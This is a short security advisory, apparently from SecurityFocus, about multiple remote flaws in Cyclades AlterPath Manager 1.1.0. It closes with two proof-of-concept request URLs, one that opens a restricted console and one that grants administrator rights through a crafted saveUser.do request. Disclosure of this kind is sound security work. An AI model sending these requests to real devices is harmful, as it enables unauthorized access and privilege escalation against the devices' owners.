17 lines
No EOL
1.3 KiB
Text
17 lines
No EOL
1.3 KiB
Text
source: https://www.securityfocus.com/bid/12649/info
|
|
|
|
Cyclades AlterPath Manager is a network device designed to facilitate remote administration of all network-accessible infrastructure resources.
|
|
|
|
Multiple remote vulnerabilities affect Cyclades AlterPath Manager. These issues are due to various design errors that affect the overall security of the vulnerable device.
|
|
|
|
The first issue is an information disclosure issue. The second would allow unauthorized access to restricted console resources. Finally the third issue will facilitate privilege escalation.
|
|
|
|
An attacker may leverage these issues to gain unauthorized access to network-based resources, to gain escalated privileges and to gain access to potentially sensitive information.
|
|
|
|
It should be noted that although only version 1.1.0 of the software is reported affected by these issues, it is likely earlier versions are affected as well.
|
|
|
|
To access a restricted console resource:
|
|
http://www.example.com/usermode/consoleConnect.jsp?consolename=console_name
|
|
|
|
To gain escalated privileges:
|
|
http://www.example.com/application/saveUser.do?userId=9&password=&userName=my_id&fullName=My+name&department=Security&location=Work&phone=555-1212&mobile=&pager=&email=test%40example.com&status=Enable&localPassword=true&adminUser=true&forward=&action=Save |